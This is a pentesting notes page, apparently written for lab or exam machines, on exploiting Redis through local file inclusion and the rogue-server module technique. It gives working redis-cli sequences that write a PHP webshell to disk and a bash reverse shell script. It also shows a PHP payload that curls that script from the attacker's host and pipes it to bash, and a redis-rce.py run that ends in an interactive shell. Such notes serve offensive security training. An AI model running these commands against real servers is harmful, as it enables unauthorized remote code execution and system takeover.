# REDIS Exploitation

Redis is a really dangerous service that we can use to load modules and other cool stuff while there are other open services around. 

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis>" %}

This guide has all we need to know.&#x20;

{% embed url="<https://github.com/n0b0dyCN/RedisModules-ExecuteCommand>" %}

This github will have the module.so that we need, just type "make".&#x20;

If we know and the service has write access try to upload files to the directories that a webserver is running. /var/www/html is a common one.&#x20;

So the key is to look around in places that we have file upload vulnerability and figure out paths.&#x20;

* [ ] Check the blog
* [ ] Enumerate
* [ ] Enumerate dbs
* [ ] Possible exploitable version
* [ ] Try PHP Webshell if webserver is open
* [ ] Try SSH key
* [ ] Try uploading module.so to ftp if possible and see if we can figure out hte path where that exact one is located so that we can locate module and execute commands

/var/ftp/anon/\<directory-name-if-applies> is usaully where the anonymous root folder is located at.&#x20;

{% embed url="<https://app.gitbook.com/s/FXeC5YxTHfutkog2Ggfm/exploitation>" %}

### REDIS + LFI&#x20;

With the Local File Inclusion you could possibly use it to locate the credentials for the redis service.

#### Possible Locations

* [ ] /etc/redis/redis.conf
* [ ] /usr/local/etc/redis.conf
* [ ] /opt/redis/

Now with credentials we can authenticate using the following command.

```
redis -h <ip>
auth <password>
```

The next thing we should try to do is enumerate the places we can write to using the configuration file of redis as well. This will be done through local file inclusion.&#x20;

```
/etc/systemd/system/redis.service
```

Once done it will give you a bunch of places where redis can write to, so now what we can do is invoke a php reverse shell or make the computer get our reverse shell.

```
─ redis-cli -h 192.168.135.166
192.168.135.166:6379> Auth Ready4Redis?
OK
192.168.135.166:6379> config set dir /opt/redis-files
OK
192.168.135.166:6379> config set dbfilename redis.php
OK
192.168.135.166:6379> 
192.168.135.166:6379> set test "<?php system($_GET['cmd']); ?>"
OK
192.168.135.166:6379> save
```

We then navigate to it with the LFI and we should get the cmd parameter. The rest is up to you.

This other method will require us to curl a shell.sh file.&#x20;

```
192.168.135.166:6379> config set dbfilename redisss.php
OK
192.168.135.166:6379> set test "<?php system('whoami'); ?>"
OK
192.168.135.166:6379> save
```

![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2FCpu6NTSc2Pc5wLxNQzVQ%2Fimage.png?alt=media\&token=32ca6e0a-91c8-4700-a28e-000f532f6aad)

So we create a shell.sh file.&#x20;

```bash
#!/bin/bash

bash -i >& /dev/tcp/192.168.49.135/80 0>&1
```

We will host a webserver on whatever port we want. With redis we will execute the following command and use local file inclusion to execute the php code.&#x20;

```
config set dbfilename redisssss.php
OK
192.168.135.166:6379> set test "<?php system('curl http://192.168.49.135:22/shell.sh | bash'); ?>"
OK
192.168.135.166:6379> save

```

Use local file inclusion to navigate to the php file.&#x20;

![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2FB04eHuk0UmiAZYAQHdXc%2Fimage.png?alt=media\&token=6a9576e2-8c18-49c8-839c-01a41467e520)

### Redis 4.x / 5.x Exploitation&#x20;

{% embed url="<https://github.com/Ridter/redis-rce>" %}

```
╭─      /home/kali/BG/redis-rce     master ?1 ▓▒░────────────────────────────────────────────────░▒▓ ✔  15s    root@kali 
╰─ python3 redis-rce.py -r 192.168.242.176 -p 6379 -L 192.168.49.242 -P 6379 -f /home/kali/BG/redis-rce/redis-rogue-server/RedisModulesSDK/exp/exp.so

█▄▄▄▄ ▄███▄   ██▄   ▄█    ▄▄▄▄▄       █▄▄▄▄ ▄█▄    ▄███▄   
█  ▄▀ █▀   ▀  █  █  ██   █     ▀▄     █  ▄▀ █▀ ▀▄  █▀   ▀  
█▀▀▌  ██▄▄    █   █ ██ ▄  ▀▀▀▀▄       █▀▀▌  █   ▀  ██▄▄    
█  █  █▄   ▄▀ █  █  ▐█  ▀▄▄▄▄▀        █  █  █▄  ▄▀ █▄   ▄▀ 
  █   ▀███▀   ███▀   ▐                  █   ▀███▀  ▀███▀   
 ▀                                     ▀                   


[*] Connecting to  192.168.242.176:6379...
[*] Sending SLAVEOF command to server
[+] Accepted connection from 192.168.242.176:6379
[*] Setting filename
[+] Accepted connection from 192.168.242.176:6379
[*] Start listening on 192.168.49.242:6379
[*] Tring to run payload
[+] Accepted connection from 192.168.242.176:46704
[*] Closing rogue server...

[+] What do u want ? [i]nteractive shell or [r]everse shell or [e]xit: i
[+] Interactive shell open , use "exit" to exit...
$ ls
$ whoami
exp_lin.so
exp.so
snap.lxd
systemd-private-e28d10f1b9db42f4847a9d60b88d7429-systemd-logind.service-D0hrMh
systemd-private-e28d10f1b9db42f4847a9d60b88d7429-systemd-resolved.service-kR64tg
systemd-private-e28d10f1b9db42f4847a9d60b88d7429-systemd-timesyncd.service-i0lI9g
vmware-root_708-2998936538
$ nc
Aprudence

```

Use the exact same path as that In order to order for it to work. Then upgrade your shell using socat.